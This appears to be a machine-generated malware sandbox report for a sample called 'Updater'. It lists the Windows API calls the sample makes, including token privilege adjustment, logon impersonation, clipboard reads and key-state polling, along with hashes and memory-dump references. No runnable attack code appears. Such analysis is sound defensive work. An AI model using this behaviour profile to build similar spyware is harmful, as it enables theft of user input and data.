                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 1279760036-0
                                                                                                  • Opcode ID: 840e92405b73f61521ab704caec2ab29ae66de61116a536ce1163d03b8cad877
                                                                                                  • Instruction ID: e51f5792ac65b5a58bf85e1c91d0421d3fd64d37f57b24319127a0d74d8a9133
                                                                                                  • Opcode Fuzzy Hash: 840e92405b73f61521ab704caec2ab29ae66de61116a536ce1163d03b8cad877
                                                                                                  • Instruction Fuzzy Hash: D0E0E53B100225D6D62136665C0C76B7AC8AF413A0F15C321FD45925E3CA5CCC0381A8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: ad30aac84e3e98822ba437de430b8f0b25f4a2d7abf700f207214490acc997ab
                                                                                                  • Instruction ID: bf3a8ef9a1982c8ce63f1e0ee09baefed7063cd9888956fc2281a487106592b0
                                                                                                  • Opcode Fuzzy Hash: ad30aac84e3e98822ba437de430b8f0b25f4a2d7abf700f207214490acc997ab
                                                                                                  • Instruction Fuzzy Hash: 4EF03071506752CFC7389F65D494826BBEBFF14329310897EE1D786620C7769844DF50
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ClearVariant
                                                                                                  • String ID:
                                                                                                  • API String ID: 1473721057-0
                                                                                                  • Opcode ID: f0e65d943d2d0ddfee9ce5eaaad801f37448436f8182c6f38ea9bd33bb1644cd
                                                                                                  • Instruction ID: 9452214c9eb6d79fc251f0be5d8141e48561da89d619e21a317c32e26a2f839c
                                                                                                  • Opcode Fuzzy Hash: f0e65d943d2d0ddfee9ce5eaaad801f37448436f8182c6f38ea9bd33bb1644cd
                                                                                                  • Instruction Fuzzy Hash: DCF02BF1F582469AEB304B68DC00BB1FBC5AB00311F10443FE9D5822C1D7B954E0A761
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: __fread_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 2638373210-0
                                                                                                  • Opcode ID: 5aa6600b3c90dabe8e751dc9537f39b12223877b02cec01d2e468d945b000684
                                                                                                  • Instruction ID: 5055fcbe9098f922f343373202da91ea020eff40241dba9281453b270fe354fa
                                                                                                  • Opcode Fuzzy Hash: 5aa6600b3c90dabe8e751dc9537f39b12223877b02cec01d2e468d945b000684
                                                                                                  • Instruction Fuzzy Hash: D0F0F87240420DFFDF05DF90C941EAABB7AFB15314F208589F9148A212D336EA61EB91
                                                                                                  APIs
                                                                                                  • GetModuleFileNameA.KERNEL32(006D0000,?,00000105), ref: 014A175F
                                                                                                    • Part of subcall function 014A19D5: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 014A19F0
                                                                                                    • Part of subcall function 014A19D5: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 014A1A0E
                                                                                                    • Part of subcall function 014A19D5: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 014A1A2C
                                                                                                    • Part of subcall function 014A19D5: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 014A1A4A
                                                                                                    • Part of subcall function 014A19D5: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,014A1AD9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 014A1A93
                                                                                                    • Part of subcall function 014A19D5: RegQueryValueExA.ADVAPI32(?,014A1C55,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,014A1AD9,?,80000001), ref: 014A1AB1
                                                                                                    • Part of subcall function 014A19D5: RegCloseKey.ADVAPI32(?,014A1AE0,00000000,00000000,00000005,00000000,014A1AD9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 014A1AD3
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                  • String ID:
                                                                                                  • API String ID: 2796650324-0
                                                                                                  • Opcode ID: 4f6f7f1076de1bd117e32dae873e78de734a710e1bc72a608b831ebaeac8ce49
                                                                                                  • Instruction ID: 958b21c4d575445898c41b6100f73bef7f91ccc2d8e20d4aa1141296c08f1cfe
                                                                                                  • Opcode Fuzzy Hash: 4f6f7f1076de1bd117e32dae873e78de734a710e1bc72a608b831ebaeac8ce49
                                                                                                  • Instruction Fuzzy Hash: 8DE06DB9A002158BDB10DE6C88C0A473BD8AB1CB90F410596AD54CF356D370D9108BD0
                                                                                                  APIs
                                                                                                  • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006EFDD8
                                                                                                    • Part of subcall function 006DF82C: _wcslen.LIBCMT ref: 006DF83F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: LongNamePath_wcslen
                                                                                                  • String ID:
                                                                                                  • API String ID: 541455249-0
                                                                                                  • Opcode ID: af332bab265141e80688eee06040af357ea30f8fde7d8ba1b41edb386b81f962
                                                                                                  • Instruction ID: a7b2b194571896738df95b8c7876a8eb7ab72eda2f82d6650aa26725197ba480
                                                                                                  • Opcode Fuzzy Hash: af332bab265141e80688eee06040af357ea30f8fde7d8ba1b41edb386b81f962
                                                                                                  • Instruction Fuzzy Hash: BAE08636A002285BC72096989C05FEA77ADDB897A1F0441B6FD09D7244D9A5AC808695
                                                                                                  APIs
                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,014B5B47,00000000,014B7F57,014B80FD,?,c:\,014B80FD,?,c:\), ref: 014A3F50
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 4572904268e265fd193fcb2e56680a69fd8facc4a158caf36c05ddde75ad2af6
                                                                                                  • Instruction ID: d7bdee560e1348a38a14923140b1b5c5dc7526a5b94ccdd15a40140d9539f696
                                                                                                  • Opcode Fuzzy Hash: 4572904268e265fd193fcb2e56680a69fd8facc4a158caf36c05ddde75ad2af6
                                                                                                  • Instruction Fuzzy Hash: C8C08CB42222001F2E14A9BE1CC084A02CC5A3C630BE21A27F0A8D22F2F332C4122820
                                                                                                  APIs
                                                                                                  • GetForegroundWindow.USER32 ref: 006E3AA9
                                                                                                    • Part of subcall function 006E4E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 006E4E6B
                                                                                                    • Part of subcall function 006E4B74: GetCursorPos.USER32(?), ref: 006E4B88
                                                                                                    • Part of subcall function 006E4B74: ScreenToClient.USER32(00000000,?), ref: 006E4BA5
                                                                                                    • Part of subcall function 006E4B74: GetAsyncKeyState.USER32(00000001), ref: 006E4BCE
                                                                                                    • Part of subcall function 006E4B74: GetAsyncKeyState.USER32(00000002), ref: 006E4BE8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AsyncStateWindow$ClientCursorForegroundLongScreen
                                                                                                  • String ID:
                                                                                                  • API String ID: 4074248120-0
                                                                                                  • Opcode ID: a27c8f6312b5a34d4aa6621d9d2509a8f0b48f0a007d020334f38bd546ccb7e0
                                                                                                  • Instruction ID: 4fd0840795a3bbc3bcfd3f0940cddafc03f2db5ef4181f186933cb40b9dbb8f5
                                                                                                  • Opcode Fuzzy Hash: a27c8f6312b5a34d4aa6621d9d2509a8f0b48f0a007d020334f38bd546ccb7e0
                                                                                                  • Instruction Fuzzy Hash: DCD05E317013604BC650AB2D9809A593652AB867307144364F4158B3E2CFA85D92CAC9
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNELBASE(00000000,00000000,?,0071062E,?,?,00000000,?,0071062E,00000000,0000000C), ref: 007102E1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 823142352-0
                                                                                                  • Opcode ID: 0a0c7e87f8622d34c1b37ad197122e2469026ff2b8a72c25c51a6a7222ce107c
                                                                                                  • Instruction ID: 29f4b902dde1b981b466b3330b2fea6a2e28c5dd4b294225197fb5cdb17b5c32
                                                                                                  • Opcode Fuzzy Hash: 0a0c7e87f8622d34c1b37ad197122e2469026ff2b8a72c25c51a6a7222ce107c
                                                                                                  • Instruction Fuzzy Hash: F7D06C3211020DBBDF128F84DD06EDA3BAAFB4C714F018000FE1856020C776E821AB94
                                                                                                  APIs
                                                                                                  • CreateDirectoryA.KERNEL32(00000000,00000000,?,014B5B52,00000000,014B7F57,014B80FD,?,c:\,014B80FD,?,c:\), ref: 014A426A
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateDirectory
                                                                                                  • String ID:
                                                                                                  • API String ID: 4241100979-0
                                                                                                  • Opcode ID: 2afb928ea0769a03e65cdb2334b4541331df32d5787a6e4dcd60dacd8e68de1d
                                                                                                  • Instruction ID: 5cc08b2be42853b131a7b84693caf2831722788eb4bad1d6b4d54405039c18e6
                                                                                                  • Opcode Fuzzy Hash: 2afb928ea0769a03e65cdb2334b4541331df32d5787a6e4dcd60dacd8e68de1d
                                                                                                  • Instruction Fuzzy Hash: EFB012927513411FFA0035FA0CC1F2E008CD73C50AF910C3BF115CB161D4BBC9041050
                                                                                                  APIs
                                                                                                    • Part of subcall function 006E1EE8: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,?,?,006DC025,?,00008000), ref: 006E1F16
                                                                                                  • GetLastError.KERNEL32(00000002,00000000), ref: 00748195
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateErrorFileLast
                                                                                                  • String ID:
                                                                                                  • API String ID: 1214770103-0
                                                                                                  • Opcode ID: 950c13a96f7afe838c088adb8e3a0dc36511b726d590057e6e82278b309a4006
                                                                                                  • Instruction ID: 680604c8a19d87abae20bd5c199f30da6d434e9a858ac694e898858697e9c6e8
                                                                                                  • Opcode Fuzzy Hash: 950c13a96f7afe838c088adb8e3a0dc36511b726d590057e6e82278b309a4006
                                                                                                  • Instruction Fuzzy Hash: 0A918F30604305DFCB54EF24C491B6EB7E2AF89310F04452EF9965B3A2CB78AD49CB96
                                                                                                  APIs
                                                                                                  • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 0149DCFA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AllocVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 4275171209-0
                                                                                                  • Opcode ID: ac5bfe8ae694c0c6ecd56124b4a956b73647b01b10d9f6a075c834e78cbab41a
                                                                                                  • Instruction ID: 3e9a6643d11e805ff0dd9582c97c7269a50c7a47cf649b464003151191841cf5
                                                                                                  • Opcode Fuzzy Hash: ac5bfe8ae694c0c6ecd56124b4a956b73647b01b10d9f6a075c834e78cbab41a
                                                                                                  • Instruction Fuzzy Hash: DF21AFB5A082469FCB50CF6CD880A5ABBE0FF98350F14896AF999CB354D330E9558B52
                                                                                                  APIs
                                                                                                  • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0149DC12
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 1263568516-0
                                                                                                  • Opcode ID: f69a1d34edfaff53cc348a64b80329e03754fb9fa6836748120b22c60e942d03
                                                                                                  • Instruction ID: d314ce7243e59c396429bdaecb1cb18f80a9c9e61948a3617cd2c22959e1197b
                                                                                                  • Opcode Fuzzy Hash: f69a1d34edfaff53cc348a64b80329e03754fb9fa6836748120b22c60e942d03
                                                                                                  • Instruction Fuzzy Hash: 5021A2746083429FC720DF5DD484A1AFBE0FB98360F24891EE5E887361D371E884CB56
                                                                                                  APIs
                                                                                                  • VirtualFree.KERNEL32(?,?,00004000), ref: 0149DDB1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeVirtual
                                                                                                  • String ID:
                                                                                                  • API String ID: 1263568516-0
                                                                                                  • Opcode ID: a0981079f91dc71f254180e150275a087ee8f8532c6ed8a233468f05e05a04e9
                                                                                                  • Instruction ID: 3cb98209587319fae5dc9d1678741a2f335b2921e22af04a3c47e74b9f0982bf
                                                                                                  • Opcode Fuzzy Hash: a0981079f91dc71f254180e150275a087ee8f8532c6ed8a233468f05e05a04e9
                                                                                                  • Instruction Fuzzy Hash: B221E0B46053029FCB20CF6CD880A1ABBF0FF89310F244959E594CB368D331E909CB92
                                                                                                  APIs
                                                                                                    • Part of subcall function 014B6409: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B644E
                                                                                                    • Part of subcall function 014B6409: WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B6466
                                                                                                    • Part of subcall function 014B6409: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B6472
                                                                                                  • Sleep.KERNEL32(00000002,00000000,014B650E), ref: 014B64EE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleSleepWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 1443029356-0
                                                                                                  • Opcode ID: 1b60810f2bbae1caab6052a0796777a4192423ebeefde8582b197da017e1d274
                                                                                                  • Instruction ID: 70bc5fff166b1d2e8e0528802523f6cbd0f47d779a8411c6bef712fce5294404
                                                                                                  • Opcode Fuzzy Hash: 1b60810f2bbae1caab6052a0796777a4192423ebeefde8582b197da017e1d274
                                                                                                  • Instruction Fuzzy Hash: 6BF04970A04609EFE701EBA6D881ADDB7FCEB78310FA2407FA504D3670DB749E618A50
                                                                                                  APIs
                                                                                                    • Part of subcall function 014B6409: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B644E
                                                                                                    • Part of subcall function 014B6409: WriteFile.KERNEL32(00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B6466
                                                                                                    • Part of subcall function 014B6409: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,014B648D), ref: 014B6472
                                                                                                  • Sleep.KERNEL32(00000002,00000000,014B650E), ref: 014B64EE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.000000000149A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0149A000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_149a000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateHandleSleepWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 1443029356-0
                                                                                                  • Opcode ID: 589b78c4b59436a8f651b027469a4d63d3ba68fe4a104665fe6222392eddf0be
                                                                                                  • Instruction ID: 9f23b0a86aaf8ee5de3a8d081d5300d6117a314b5c8ce6c50611625af7c695e5
                                                                                                  • Opcode Fuzzy Hash: 589b78c4b59436a8f651b027469a4d63d3ba68fe4a104665fe6222392eddf0be
                                                                                                  • Instruction Fuzzy Hash: A7F04970604509EFE701DBA6D4916DDB7F9EB78300FA2447FE404D3670D7749E618A10
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2238771515.00000000014BF000.00000040.00000020.00020000.00000000.sdmp, Offset: 014BF000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_14bf000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
                                                                                                  • Instruction ID: 67378a7150f3be02058e3c94d288c1121e178886b66468af1df8f5dec15916ab
                                                                                                  • Opcode Fuzzy Hash: daf07dfe0449386a21cd617d80c280d79caee84e403b1fdd0f7a77803a7c3103
                                                                                                  • Instruction Fuzzy Hash: E0313B29304602EAEF518A6CCE20B937B5CBF11B74F0C031FE55D936A5E7389551C7A5
                                                                                                  APIs
                                                                                                  • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 00765969
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend
                                                                                                  • String ID: %d/%02d/%02d
                                                                                                  • API String ID: 3850602802-328681919
                                                                                                  • Opcode ID: 213164796b2937225aff24e40d70bbd31b52263703cc370783e2fa0853b5689b
                                                                                                  • Instruction ID: ab3e464a37e43840f6edaebaa731877652e5190e98f718cd8389c1f964a7a1c6
                                                                                                  • Opcode Fuzzy Hash: 213164796b2937225aff24e40d70bbd31b52263703cc370783e2fa0853b5689b
                                                                                                  • Instruction Fuzzy Hash: 8512E071A00714EBEB248F29CC49FAE7BA4EF45750F10821AF917EB2D1DBB89941DB14
                                                                                                  APIs
                                                                                                    • Part of subcall function 007327D9: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00732823
                                                                                                    • Part of subcall function 007327D9: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00732850
                                                                                                    • Part of subcall function 007327D9: GetLastError.KERNEL32 ref: 00732860
                                                                                                  • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00732394
                                                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 007323B6
                                                                                                  • CloseHandle.KERNEL32(?), ref: 007323C7
                                                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 007323DF
                                                                                                  • GetProcessWindowStation.USER32 ref: 007323F8
                                                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00732402
                                                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0073241E
                                                                                                    • Part of subcall function 007321C9: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00732308), ref: 007321DE
                                                                                                    • Part of subcall function 007321C9: CloseHandle.KERNEL32(?,?,00732308), ref: 007321F3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000023.00000002.2237487910.00000000006D1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 006D0000, based on PE: true
                                                                                                  • Associated: 00000023.00000002.2237462095.00000000006D0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.000000000076D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237794040.0000000000791000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237853516.000000000079D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  • Associated: 00000023.00000002.2237879477.00000000007A5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_35_2_6d0000_Updater.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                  • String ID: $4iy$default$winsta0
                                                                                                  • API String ID: 22674027-2664196769
                                                                                                  • Opcode ID: 807ff6edaa1ded4dfe6ea68ff1326f3da8afd8681b7d0a2f21665e888f5fbddd
                                                                                                  • Instruction ID: e00ea44080d21bc41e567df70f45721ba8479a5a16b6c46e7d7812b5c84709a0
                                                                                                  • Opcode Fuzzy Hash: 807ff6edaa1ded4dfe6ea68ff1326f3da8afd8681b7d0a2f21665e888f5fbddd
                                                                                                  • Instruction Fuzzy Hash: 9D81C4B1A00309AFEF209FA4DC09FEE7BB8EF04300F144059F911A61A2C7798E56CB64
                                                                                                  APIs
                                                                                                  • OpenClipboard.USER32 ref: 0074F68E
                                                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0074F69C
                                                                                                  • GetClipboardData.USER32(0000000D), ref: 0074F6A8
                                                                                                  • CloseClipboard.USER32 ref: 0074F6B4
